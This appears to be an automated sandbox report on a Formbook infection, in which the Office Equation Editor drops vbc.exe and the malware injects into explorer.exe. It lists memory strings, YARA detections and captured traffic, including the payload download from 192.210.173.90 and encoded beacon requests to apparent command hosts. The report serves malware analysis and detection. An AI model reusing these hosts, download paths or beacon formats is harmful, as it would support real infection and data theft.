3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: vbc.exe, 00000004.00000002.466454862.0000000002C60000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.470431447.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 00000006.00000000.512027103.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: vbc.exe, 00000004.00000002.466454862.0000000002C60000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.470431447.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
          Source: vbc.exe, 00000004.00000002.466454862.0000000002C60000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.470431447.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.487883890.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.467436694.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.480003695.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
          Source: vbc.exe, 00000004.00000002.466643244.0000000002E47000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.489358652.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: vbc.exe, 00000004.00000002.466643244.0000000002E47000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.489358652.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: vbc.exe, vbc.exe, 00000004.00000002.464908482.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000004.00000000.456767218.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.461220666.0000000000409000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: vbc.exe, 00000004.00000002.464908482.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000004.00000000.456767218.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.461220666.0000000000409000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: vbc.exe, 00000004.00000002.465747026.00000000022C0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.480237988.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.490467352.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: vbc.exe, 00000004.00000002.466643244.0000000002E47000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.489358652.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.512027103.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.512027103.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: vbc.exe, 00000004.00000002.466643244.0000000002E47000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.489358652.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: vbc.exe, 00000004.00000002.465747026.00000000022C0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.480237988.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.487883890.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.467436694.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.480003695.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000006.00000000.512027103.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: vbc.exe, 00000004.00000002.466454862.0000000002C60000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.470431447.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: vbc.exe, 00000004.00000002.466643244.0000000002E47000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.489358652.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.512027103.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: vbc.exe, 00000004.00000002.466454862.0000000002C60000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.470431447.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.510856156.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.484145859.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.472911483.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.472698287.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493785914.0000000008417000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.483993743.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.486816221.00000000083D7000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.510967068.0000000004513000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.510856156.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.472698287.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493785914.0000000008417000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.483993743.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.486816221.00000000083D7000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.470431447.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.487883890.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.467436694.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.480003695.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 00000007.00000002.671238367.0000000002E22000.00000004.00020000.sdmpString found in binary or memory: https://www.clicktoreach.com/m07f/?8p=5jRPexjhYVA&8pM=igd9ZaB/0LuNZ3khfd1rv5ythTuTDfiv5fbgroetehOkX6
          Source: explorer.exe, 00000006.00000000.487883890.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.467436694.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.480003695.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000006.00000000.487883890.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.467436694.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.480003695.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7441E635.emfJump to behavior
          Source: unknownDNS traffic detected: queries for: www.promtgloan.com
          Source: global trafficHTTP traffic detected: GET /70007/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.173.90Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /m07f/?8p=5jRPexjhYVA&8pM=fckM7dU8XdB/CBRKAli8IWZTeVSsZcSnfT9NsehECm7QI2Avboj8F2o4ZiYCfg8g2yKAcw== HTTP/1.1Host: www.promtgloan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m07f/?8pM=dna2QeGax28GSJkNz7Uka6j7mpWTPT6ewM6loPSgIzIWFgZfz42ON2JlykoAty+SKeMdPQ==&8p=5jRPexjhYVA HTTP/1.1Host: www.yhxt13800.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m07f/?8p=5jRPexjhYVA&8pM=igd9ZaB/0LuNZ3khfd1rv5ythTuTDfiv5fbgroetehOkX6jie/kGfA2Y9msKDFCRQxq0nA== HTTP/1.1Host: www.clicktoreach.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.vbc.exe.510000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.510000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.494095380.00000000095A5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.525306169.0000000000560000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.669495000.0000000000330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.463047286.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.669355971.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.463706165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.669436738.0000000000270000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.525208793.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.464395143.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.465187885.0000000000510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.487044128.00000000095A5000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 4.2.vbc.exe.510000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.510000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.510000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.510000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.494095380.00000000095A5000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.494095380.00000000095A5000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.525306169.0000000000560000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.525306169.0000000000560000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.669495000.0000000000330000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.669495000.0000000000330000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.463047286.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.463047286.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.669355971.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.669355971.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.463706165.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.463706165.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.669436738.0000000000270000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.669436738.0000000000270000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.525208793.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.525208793.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000001.464395143.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000001.464395143.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.465187885.0000000000510000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.465187885.0000000000510000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.487044128.00000000095A5000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.487044128.00000000095A5000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: 4.2.vbc.exe.510000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.510000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.510000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.510000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.494095380.00000000095A5000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.494095380.00000000095A5000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.525306169.0000000000560000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.525306169.0000000000560000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
